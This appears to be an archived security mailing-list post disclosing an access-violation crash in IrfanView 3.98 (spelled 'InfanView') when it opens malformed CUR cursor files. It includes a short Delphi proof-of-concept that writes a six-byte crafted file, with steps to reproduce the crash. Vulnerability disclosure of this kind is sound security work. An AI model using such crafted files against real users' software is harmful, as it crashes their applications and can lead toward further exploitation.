InfanView 3.98 (with plugins) - Access violation at processing images CUR files

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Example (in Delphi):

===============cur.dpr===============
program cur;
{$APPTYPE CONSOLE}
const
  FileName='file.cur';
  Len=6;
  Buf=#$00#$00#$01#$00#$00#$00;
var
  F:File;
begin
  AssignFile(F,FileName);
  Rewrite(F,1);
  BlockWrite(F,Buf,Len);
  CloseFile(F);
end.
===============cur.dpr===============

1) Compile and Run "cur.dpr" with Delphi
2) Open "file.cur" with InfanView

[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux